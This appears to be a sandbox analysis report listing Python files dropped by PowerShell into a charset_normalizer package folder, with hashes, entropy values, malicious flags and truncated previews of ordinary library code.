                                                                                                                                                                                                                              SHA-256:9B571412C6FD2B9BFCDF59BD3FF96FD8995410A0FB321C4BEDFC70DE19FBE68E
                                                                                                                                                                                                                              SHA-512:EDE2F24B335C2D43C9DF86B865A06E932B884EAD68747F79893F6C00D99DB9A97BD1C9B7A529183278BE0CA78E8E3A798A221C35FCF92335F671510CA993412B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.."""..Charset-Normalizer..~~~~~~~~~~~~~~..The Real First Universal Charset Detector...A library that helps you read text from an unknown charset encoding...Motivated by chardet, This package is trying to resolve the issue by taking a new approach...All IANA character set names for which the Python core library provides codecs are supported.....Basic usage:.. >>> from charset_normalizer import from_bytes.. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')).. >>> best_guess = results.best().. >>> str(best_guess).. 'B.... ..... ... ..... .. ............ O............!'....Others methods and usages are available - see the full documentation..at <https://github.com/Ousret/charset_normalizer>...:copyright: (c) 2021 by Ahmed TAHRI..:license: MIT, see LICENSE for more details..."""..import logging....from .api import from_bytes, fro
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):77
                                                                                                                                                                                                                              Entropy (8bit):4.168966465012458
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1LGGMHRYF0AnrjhAjpv/Fhq0AHy:1LCxgNFAjpH7q0
                                                                                                                                                                                                                              MD5:A7BB1AAA21433C358CD1B40294C6627E
                                                                                                                                                                                                                              SHA1:8C1F3F49FCABE5D1F2AFD9B607D5F8B1C0CAE96D
                                                                                                                                                                                                                              SHA-256:9D59CCA37D614CF376632D38E46248BC78F774A0C9CF8740411DDC51276F6327
                                                                                                                                                                                                                              SHA-512:D7324A84DCC20C30F722E481DC1D84D322A8CE84DD4CF0798F4ABEACA1DBBB6872C626521AF877D19798351B6A1900F1EEAC71FEEB0F83A3E21EE9AA056124D1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from .cli import cli_detect....if __name__ == "__main__":.. cli_detect()..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1708
                                                                                                                                                                                                                              Entropy (8bit):5.6900618701754775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Wd4LbqjQtyat/c2vhCMhju/C/edBwheCNtax:8qbqjQttwZ/C/edBwheoS
                                                                                                                                                                                                                              MD5:FEA524D3E8B33FE19D88350C0AF037CB
                                                                                                                                                                                                                              SHA1:E8FC598F06AF46B67AA2FA1D441923DF43F7F7E0
                                                                                                                                                                                                                              SHA-256:13C7D4137BB5336D507A0D7A0964DB67BF059B98AD31D2847CCF7E7D62C2A230
                                                                                                                                                                                                                              SHA-512:157BBBCC4191358A5388CD170789E1E97EE73FACA75116D73D4C0C76909352D0F06E24CF048EDB3F22B5034AF67D005EE84B9B1A5CE8881C43B0ECC3E6937BC5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.VfW...............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z...e.j$..................d.........j'....................e.j(....................................y.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full doc
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):278
                                                                                                                                                                                                                              Entropy (8bit):5.0079132646076765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:bag/eaMlPQJd6/rti+uw52KNdArsQx6GCrIanPGt:bag/YsOwKNhQ8GCcanet
                                                                                                                                                                                                                              MD5:96F977AB13252F86A635BF4D13C4CD46
                                                                                                                                                                                                                              SHA1:F2BFC0D89177A15FFAA5E3BD3E6E03761984CDB1
                                                                                                                                                                                                                              SHA-256:557B008315569571E05E2F125B8771086EEC542F7AAD216CC57933FBF7CC905A
                                                                                                                                                                                                                              SHA-512:A8E6FF4D95258B707E47DEBF298A30A84D0AE6399C2DC7B5F24357F3DAB23A1E6E2FD3E4D7944431B35718F73A3C3C04117637D53C445BBE1EFCC96883D93971
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.VfM.........................*.....d.d.l.m.Z...e.d.k(..r...e...........y.y.)......)...cli_detect..__main__N)...clir......__name__........LC:\Users\xbov\Desktop\pyops\Lib\site-packages\charset_normalizer/__main__.py..<module>r........s................z.......L.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17311
                                                                                                                                                                                                                              Entropy (8bit):5.67967121924605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:m2FJgeg5BZudhZZaNzCvq0nu8QdPwMgikSKKnIHv4:m2FJDg2hZZfq0nS1QSKKnWv4
                                                                                                                                                                                                                              MD5:00121C055BAA868C88CD02E838365A54
                                                                                                                                                                                                                              SHA1:1BCF022C90CEA09EA478835FFD5BAC14074977E8
                                                                                                                                                                                                                              SHA-256:EEA497BA4152AE6EF8282FB378AAE9428DC809C9F0F2D0AEED155DD561DA9A21
                                                                                                                                                                                                                              SHA-512:7A190C1BF8A204F5CF9E5F3B539E2F5C097077135CB684CBC076D9AB67E66471E1D109B88C9EC8EEBE4DD04AF7D3B516BC90ECC37AB1B20CB6F2FBE1A6BB3C7F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf.T..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j@..................d.........Z!..e.jD..........................Z#e#jI....................e.jJ..................d.....................................d.d.e.e&e'f.....d.e(d.e(d.e)d.e.e.e*........d.e.e.e*........d.e+d.e+d.e)d.e+d.e.f.d...Z,..................d.d.e.d.e(d.e(d.e)d.e.e.e*........d.e.e.e*........d.e+d.e+d.e)d.e+d.e.f.d...Z-..................d.d.e.e*e&e.f.....d.e(d.e(d.e)d.e.e.e*........d.e.e.e*........d.e+d.e+d.e)d.e+d.e.f.d...Z...................d.d.e.e.e*e.e&f.....d.e(d.e(d.e)d.e.e.e*........d.e.e.e*........d.e+d.e+d.e)d.e+d.e+f.d...Z/y.) .....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...Charse
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13471
                                                                                                                                                                                                                              Entropy (8bit):5.7392315791207285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:DCqlZSmTuFdIRa9FUPBgjUQ2MxLX5huDT4nXnJ9:DCqlZXCFdaWFUPBgjUQ2MRX5h24J9
                                                                                                                                                                                                                              MD5:80C4AE6E145416615F862AAB58B6086A
                                                                                                                                                                                                                              SHA1:CD1EBDBB56880632293B79ED943B116C9707F970
                                                                                                                                                                                                                              SHA-256:474A6606BA119EFB924E6B1947019F1C9D6D0F4CF0EF75FEF48E84865F737681
                                                                                                                                                                                                                              SHA-512:5A03245C7655C6AE7B30B62DA4B088B2C87F08BC6A33FE2AB85049D527A7F94E38234508F0A3DCF260D2846637A9C50AD2E73537A58AFB59D32B15849C57AA48
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf.2..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z...e.........d.e.d.e.e.....f.d...........Z ..e.........d.e.d.e.e.....f.d...........Z!..e.e...........d.e.d.e.e"e"f.....f.d...........Z#..d#d.e.e.....d.e"d.e.e.....f.d...Z$d.e.d.e.e.....d.e%f.d...Z&d.e.d.e.e.....f.d...Z'd.e.e.....d.e.f.d...Z(d.e.d.e.f.d...Z)..e.d.............d$d.e.d e%d!e.e.....d.e.f.d"..........Z*y.)%.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc...........................t.........|.........r.t.........d...........t.........j...............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):38735
                                                                                                                                                                                                                              Entropy (8bit):6.020911455774388
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:7dE+3hHHN66swuCD8kRJxVMrMe3CMp2dcpWbBP2LCBoGM8nTCEWm7YsIKXMTkNXL:7dE+RnN66N74wJxepZTkN7as1ZV
                                                                                                                                                                                                                              MD5:D6D312EE992F06DE2600A9240A45B8A2
                                                                                                                                                                                                                              SHA1:D3F9FB43179FCE1897A25936558CC568FA10F3F9
                                                                                                                                                                                                                              SHA-256:30C3CE38C76105EAA8BDDCC44DD09927F7858F93D4B00C7613408EBC499062AF
                                                                                                                                                                                                                              SHA-512:F4C018C913ED67CDAC96DF77BC431B13CD61144FCBB1B1F9F3CA2F36D9BBDE6180D99B7E4E957F93FC84E62892E630DED4DADCF5AE37D407FB39E9765F0593B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf.........................R&....U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e.....f.....f.....e.d.<...d.Z.e.e.d.<.....e.d.........Z.e.e.d.<...d.Z.e.e.d.<...i.d...e.d...........d...e.d.d...........d...e.d.d...........d...e.d.d...........d...e.d.d...........d...e.d.d...........d...e.d.d...........d...e.d.d...........d...e.d.d...........d ..e.d.d!..........d"..e.d!d#..........d$..e.d#d%..........d&..e.d%d'..........d(..e.d'd)..........d*..e.d)d+..........d,..e.d+d-..........d...e.d-d/..........i.d0..e.d/d1..........d2..e.d1d3..........d4..e.d3d5..........d6..e.d5d7..........d8..e.d7d9..........d:..e.d9d;..........d<..e.d;d=..........d>..e.d=d?..........d@..e.d?dA..........dB..e.dAdC..........dD..e.dCdE..........dF..e.dEdG..........dH..e.dGdI..........dJ..e.dIdK..........dL..e.dKdM..........dN..e.dMdO..........dP..e.dOdQ............i.dR..e.dQdS..........dT..e.dSdU..........dV..e.dUdW..........dX..e.dWdY
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2479
                                                                                                                                                                                                                              Entropy (8bit):5.536090882671083
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kwjE8O3rnXQNSz7hSh3Ue75yubxeN7hs2e6heC01uBV9EIk8Z7Kz9V:kwhi4ISyo5yc4NG2e6herO5kjD
                                                                                                                                                                                                                              MD5:0621C1CA67627E189C27E5AE63EE8AC6
                                                                                                                                                                                                                              SHA1:48D557D45DB982435DED0178EB2B6141DED1A42A
                                                                                                                                                                                                                              SHA-256:C403C6C0B439A0F589ED4EF0AFFE946C16EE469E5C2FB9A81F8714089EC30344
                                                                                                                                                                                                                              SHA-512:5FB5C581023AFC7DA44FBA0715680021EBE9FA1FA5612B96755DA19FFF66E00BF281E3CA77A012B871E80211CAD2C17D781E01069CFAC56FE5A23E1D9386BE0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.VfM.........................v.....d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.e.d.e.d.e.d.e.e.e.e.e.e.f.........f.....f.d...Z.y.)......)...Any..Dict..Optional..Union)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCE..byte_str..should_rename_legacy..kwargs..returnc.....................F.....t.........|.........r5t.........d.d.j...................t.........|.j.............................................d.............t.........|.t.........t.........f.........s#t.........d.j...................t.........|...........................t.........|.t.................r.t.........|.........}.t.........|.........j...........................}.|...|.j...................n.d.}.|...|.j...................d.k7..r.|.j...................n.d.}.|...d.|.j...................z...n.d.}.|...|.d.k(..r.|.j ..................r.|.d.z...}.|.d.u.r.|.t"........v.r.t"........|.....}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte string. It should
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24493
                                                                                                                                                                                                                              Entropy (8bit):5.147654642760363
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:tcrO10L+QjILTiF/RaqqUuYNmVH7Bpa7cQUZFZvcq:tcg+jmN7/EMZjvH
                                                                                                                                                                                                                              MD5:E6B3F49D9480F3385DF941A240BA3376
                                                                                                                                                                                                                              SHA1:593662D3518474A048ED1F97285B18A94B8DF51E
                                                                                                                                                                                                                              SHA-256:7FFC9AE5891402182A3C375D5357468A5CC473F903B6A19081512C783711DC80
                                                                                                                                                                                                                              SHA-512:9EA54D6784B5127B697271AA2603184F180E0CCBB2DCC864771636420FD763825210A6A71E780804E0F1CCE2B403E9ECF386C2633E4E5529103CAE35D3207BDD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf.O..............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z ..G.d...d.e.........Z!..G.d...d.e.........Z"..G.d...d.e.........Z#..G.d...d.e.........Z$..G.d...d.e.........Z%..G.d...d.e.........Z&..e.d...........d.e.e'....d.e.e'....d.e(f.d ..........Z)..e.d!............d'd"e'd#e*d$e(d.e*f.d%..........Z+y&)(.....)...lru_cache)...getLogger)...List..Optional.....)...COMMON_SAFE_ASCII_CHARACTERS..TRACE..UNICODE_SECONDARY_RANGE_KEYWORD)...is_accentuated..is_arabic..is_arabic_isolated_form..is_case_variable..is_cjk..is_emoticon..is_hangul..is_hiragana..is_katakana..is_latin..is_punctuation..is_separator..is_symbol..is_thai..is_unprintable..remove_accent..unicode_rangec.....................N.....e.Z.d.Z.d.Z.d.e.d.e.f.d...Z.d.e.d.d.f.d...Z.d.d...Z.e.d.e.f.d...........Z.y.)...MessDetectorPluginzy
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16583
                                                                                                                                                                                                                              Entropy (8bit):5.139835597063325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:0dLS+8HzHpr++Zl3sJq4FMf1Iv7yNxp0QBi:0dutHprTl3sQf1IDuf0Q8
                                                                                                                                                                                                                              MD5:78C2DBA3A15B9C927318426E249CF1DE
                                                                                                                                                                                                                              SHA1:61B220D07DAC918FC4C4CA9C63C416BD9FAECFEA
                                                                                                                                                                                                                              SHA-256:0174135E89278956C1288EBFFA293E39FDC5481CA54FBA47A51E244AC81B5ACE
                                                                                                                                                                                                                              SHA-512:8D27CDA3337989465B57BEDB5B1D1E597F014912F45CAC7C267ACC76C03C508CFF9A406B4E454CF78DF51F5FA0A48435FAD8B57FA6857F5048D21887A3A493D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf................................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.........Z...G.d...d.........Z.e.e.e.f.....Z.e.e.....Z...G.d...d.........Z.y.)......)...aliases)...sha256)...dumps)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec...........................e.Z.d.Z...d$d.e.d.e.d.e.d.e.d.d.d.e.e.....f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.e.d.e.f.d...........Z.d.e.f.d...Z.d.e.f.d...Z.d%d...Z.e.d.e.f.d...........Z.e.d.e.e.....f.d...........Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.e.d.e.e.....f.d...........Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.e.d.e.d.....f.d...........Z.e.d.e.f.d...........Z.e.d.e.e.....f.d...........Z.e.d.e.e.....f.d ..........Z d&d!e.d.e.f.d"..Z!e.d.e.f.d#..........Z"y.)'..CharsetMatchN..payload..guess
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14346
                                                                                                                                                                                                                              Entropy (8bit):5.496138861458537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:a9eh+t5iks6E/iFdxBM+cCMPSw0gE+4PqT3l:sbmkrzB6CuegE+66V
                                                                                                                                                                                                                              MD5:8506A91918CE30904B2CDEFB79745114
                                                                                                                                                                                                                              SHA1:EEBFC77940E9627B2F2652A49C594EA1028393A7
                                                                                                                                                                                                                              SHA-256:22FAFE55821DFC9F1621EAFCBBEA6EF35404CDFC0EB1D28A14F65434254DCCA8
                                                                                                                                                                                                                              SHA-512:14F398A65FC9292417B721C8C235373A1CC9D38F75D7F8F5F2F1E933482902FCB95DFE2ABA320175170E9A4CFC75659F5F13DE8315BBF2D2B79A239B09099CB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf.0.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.e...........d.e.d.e.f.d...........Z...e.e...........d.e.d.e.f.d...........Z...e.e...........d.e.d.e.e.....f.d...........Z...e.e...........d.e.d.e.f.d...........Z ..e.e...........d.e.d.e.f.d...........Z!..e.e...........d.e.d.e.f.d...........Z"..e.e...........d.e.d.e.f.d...........Z#..e.e...........d.e.d.e.f.d...........Z$..e.e...........d.e.d.e.f.d...........Z%..e.e...........d.e.d.e.f.d...........Z&..e.e...........d.e.d.e.f.d...........Z'..e.e...........d.e.d.e.f.d...........Z(..e.e...........d.e.d.e.f.d...........Z)..e.e...........d.e.d.e.f.d...........Z*..e.e...........d.e.d.e.f.d...........Z+..e.e...........d.e.d.e.f.d...........Z,..e...e-e...................d.e.d.e.f.d...........Z...e.e...........d.e.d.e.f.d...........Z/dAd e0d!e1d.e.e.....f.d"..Z2..e.d#..........d$e.d.e.f.d%..........Z3d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):305
                                                                                                                                                                                                                              Entropy (8bit):5.24214358118776
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TOtT6Ss5gltVCrb6SDbNt/8uw52KNdArsQx6GCZ5anM6kDtAn:TaT6Ss5gX3S3n/8cKNhQ8GCZ5anMMn
                                                                                                                                                                                                                              MD5:912A64E3851812BCE36E688D64010FBB
                                                                                                                                                                                                                              SHA1:1B89CE71DD801EE2E6223B7B74C320B1F04F9F62
                                                                                                                                                                                                                              SHA-256:0E9098D6C2AFA553B36B9AD46D41C069710F283DF390F5B54CC38F890892A6F0
                                                                                                                                                                                                                              SHA-512:CD3342E280B380F81C56CDB12F16A460EEEE7C08C8B1D4D78984D0207F0BA00B7DDD1980A71A003E27E587C41B71CF005CCFF6F3EB8E7F923CCF07CE2A2E8278
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.VfU...............................d.Z.d.Z.e.j...................d.........Z.y.).z..Expose version.z.3.3.2...N)...__doc__..__version__..split..VERSION........KC:\Users\xbov\Desktop\pyops\Lib\site-packages\charset_normalizer/version.py..<module>r........s!..............................C.. ..r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21723
                                                                                                                                                                                                                              Entropy (8bit):4.344893314336944
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:p2x1hvkZ+5NKZOptbYe5pNjxaC6FeMLMNIo7g7ZSKF:Ax1hcZ+5N/pJPpNjn6FeNb7cZSKF
                                                                                                                                                                                                                              MD5:3DCEEAA50D7F4FECF99A18787955C802
                                                                                                                                                                                                                              SHA1:298156169704CF6F1E34722625D029AA0A4D3F24
                                                                                                                                                                                                                              SHA-256:A852F47EB52B71F718109986A6AA09E007FAF13A15B9EDDFE522B5829F140B94
                                                                                                                                                                                                                              SHA-512:AC1F37A7BDD8E7DBFBE6F4F242D30E2D8F72F80B1708D69360C841BDB756B7BCAFEBB4DED5BF24EC1AA3FBD85370F6BA63D7CAB5C42B9B12AAAFB91B06596C83
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import logging..from os import PathLike..from typing import BinaryIO, List, Optional, Set, Union....from .cd import (.. coherence_ratio,.. encoding_languages,.. mb_encoding_languages,.. merge_coherence_ratios,..)..from .constant import IANA_SUPPORTED, TOO_BIG_SEQUENCE, TOO_SMALL_SEQUENCE, TRACE..from .md import mess_ratio..from .models import CharsetMatch, CharsetMatches..from .utils import (.. any_specified_encoding,.. cut_sequence_chunks,.. iana_name,.. identify_sig_or_bom,.. is_cp_similar,.. is_multi_byte_encoding,.. should_strip_sig_or_bom,..)....# Will most likely be controversial..# logging.addLevelName(TRACE, "TRACE")..logger = logging.getLogger("charset_normalizer")..explain_handler = logging.StreamHandler()..explain_handler.setFormatter(.. logging.Formatter("%(asctime)s | %(levelname)s | %(message)s")..)......def from_bytes(.. sequences: Union[bytes, bytearray],.. steps: int = 5,.. chunk_size: int = 512,.. threshold: float = 0.2,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12955
                                                                                                                                                                                                                              Entropy (8bit):4.565085883136704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:auWIiX1vR2Yf2bb6WjCKJdnZsisOQ07Tzfh+3gnfmus+rt5E/t7RV:ayiXF+Pp7Tzfh+wnfmufrt5E/t7RV
                                                                                                                                                                                                                              MD5:743B974C6FFEB35D433C276B344A1140
                                                                                                                                                                                                                              SHA1:F1CA137C1BA5049C0AB7661DE0E66F4C51F03DD8
                                                                                                                                                                                                                              SHA-256:61F937B1B79ED17AA8D7EBE64186CEA8CE75F926A35CF2F31551BCF674EC6737
                                                                                                                                                                                                                              SHA-512:26497E2EFA6761838067810097FE8B355AB5E838C3DBA908EA0240B158CB47B13717942B32F15A9AE8B3EBAFE2029412B9A777C7485F91A48A03D1892EBACE64
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import importlib..from codecs import IncrementalDecoder..from collections import Counter..from functools import lru_cache..from typing import Counter as TypeCounter, Dict, List, Optional, Tuple....from .constant import (.. FREQUENCIES,.. KO_NAMES,.. LANGUAGE_SUPPORTED_COUNT,.. TOO_SMALL_SEQUENCE,.. ZH_NAMES,..)..from .md import is_suspiciously_successive_range..from .models import CoherenceMatches..from .utils import (.. is_accentuated,.. is_latin,.. is_multi_byte_encoding,.. is_unicode_range_secondary,.. unicode_range,..)......def encoding_unicode_range(iana_name: str) -> List[str]:.. """.. Return associated unicode ranges in a single byte code page... """.. if is_multi_byte_encoding(iana_name):.. raise IOError("Function not supported on multi-byte code page").... decoder = importlib.import_module(.. "encodings.{}".format(iana_name).. ).IncrementalDecoder.... p: IncrementalDecoder = decoder(errors="ignore").. seen_ran
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):106
                                                                                                                                                                                                                              Entropy (8bit):4.336412994117974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1L6jZKXRYF0AaUFvLzaqDFoNW/kJM7RActNL4op:1Lu0BgounD6WsJM7ZtZ4op
                                                                                                                                                                                                                              MD5:FAC8FDA8B9C67E4FE079EB2B712EA666
                                                                                                                                                                                                                              SHA1:DCA37B0BF798ABC6801A97100549400939882371
                                                                                                                                                                                                                              SHA-256:08EC0FF1F2B6A9BBA574C7A6DA52FCD4989E63E3C80361B6199E487403CC3C50
                                                                                                                                                                                                                              SHA-512:01EBCBA22F54C86A9C4B7093523C1729917E097C29F626F6940AA71AA39622AE5D8DFB2272AF0ED64976795477B3ED1E881EA2FB9B17612664E60C28AC454DEA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from .__main__ import cli_detect, query_yes_no....__all__ = (.. "cli_detect",.. "query_yes_no",..)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10040
                                                                                                                                                                                                                              Entropy (8bit):4.016136127999308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZVqYUPQuTDuX0gWP7EkjzetFJltUlHHiThp:ZVqYUP5DD7EG+FJltUlcH
                                                                                                                                                                                                                              MD5:736969E9EFF624D9D34708313644E6F6
                                                                                                                                                                                                                              SHA1:A69D7BF335809168C95DE7818DE592F2E47AC996
                                                                                                                                                                                                                              SHA-256:AECF9C062A41CEBEDDD1301A51AD271B8AAB8D785D75D782541F9FE97B7FC12D
                                                                                                                                                                                                                              SHA-512:91A2E0F161502AE170A0E1708C02C5968D06A1B27E401D021A5D4F55D04B9A6F12E4BAF563290B95699151D10DC58ADD3732AFA40A0554E730139911EB46A8F2
                                                                                                                                                                                                                              Malicious:true
